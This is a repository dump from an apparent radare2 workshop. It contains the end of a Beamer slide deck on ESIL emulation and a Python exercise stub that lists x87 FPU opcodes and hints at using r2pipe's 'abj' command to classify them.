stored \alert{eip} at \alert{esp} 175 | \item Else, store \alert{eip} 176 | \end{enumerate} 177 | \item Else, if the instruction is \alert{loop}, store its location 178 | \item Step and goto \emph{2}. 179 | \end{enumerate} 180 | \end{frame} 181 | 182 | \section{Your turn!} 183 | 184 | \begin{frame}{My solution} 185 | \includegraphics[width=\textwidth]{solution.png} 186 | \end{frame} 187 | 188 | \section*{Conclusion} 189 | \begin{frame}{Conclusion} 190 | \begin{center} 191 | \only<1>{ 192 | \begin{itemize} 193 | \item ESIL is cool 194 | \item Still WIP 195 | \item More to come! 196 | \end{itemize} 197 | } 198 | \only<2>{ 199 | \Large 200 | Radare2 is \alert{nice}. 201 | 202 | You should use it. 203 | } 204 | \end{center} 205 | \end{frame} 206 | 207 | \begin{frame}{Resources} 208 | \begin{itemize} 209 | \item \href{https://github.com/radare/radare2}{Github repo} 210 | \item \href{http://rada.re}{Official website} 211 | \item \href{http://radare.today}{The r2 blog} 212 | \item \href{http://maijin.github.io/radare2book/}{The r2 book} 213 | \item \href{https://twitter.com/radareorg}{Twitter} 214 | \end{itemize} 215 | \end{frame} 216 | 217 | \end{document} 218 | -------------------------------------------------------------------------------- /shikata_ga_nai/test_fpu.py: -------------------------------------------------------------------------------- 1 | import r2pipe 2 | import sys 3 | 4 | opcodes = [ 5 | 'd9d0', 'd9e1', 'd9f6', 'd9f7', 'd9e5', 'd9e8', 'd9e9', 'd9ea', 'd9eb', 'd9ec', 6 | 'd9ed', 'd9c0', 'd9c1', 'd9c2', 'd9c3', 'd9c4', 'd9c5', 'd9c6', 'd9c7', 'd9c8', 7 | 'd9c9', 'd9ca', 'd9cb', 'd9cc', 'd9cd', 'd9ce', 'dac0', 'dac1', 'dac2', 'dac3', 8 | 'dac4', 'dac5', 'dac6', 'dac7', 'dac8', 'dac9', 'daca', 'dacb', 'dacc', 'dacd', 9 | 'dace', 'dacf', 'dad0', 'dad1', 'dad2', 'dad3', 'dad4', 'dad5', 'dad6', 'dad7', 10 | 'dad8', 'dad9', 'dada', 'dadb', 'dadc', 'dadd', 'dade', 'dbc0', 'dbc1', 'dbc2', 11 | 'dbc3', 'dbc4', 'dbc5', 'dbc6', 'dbc7', 'dbc8', 'dbc9', 'dbca', 'dbcb', 'dbcc', 12 | 'dbcd', 'dbce', 'dbcf', 'dbd0', 'dbd1', 'dbd2', 'dbd3', 'dbd4', 'dbd5', 'dbd6', 13 | 'dbd7', 'dbd8', 'dbd9', 'dbda', 'dbdb', 'dbdc', 'dbdd', 'dbde', 'ddc0', 'ddc1', 14 | 'ddc2', 'ddc3', 'ddc4', 'ddc5', 'ddc6' 15 | ] 16 | 17 | r = r2pipe.open('-') 18 | 19 | # Hint: `abj` is the command you're looking for 20 | # Hint2: you're checking the `family` of the opcode 21 | 22 | -------------------------------------------------------------------------------- /slides.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/XVilka/hacklu/1f9b60c121c004897bf7e00b341de158e1b70e11/slides.pdf --------------------------------------------------------------------------------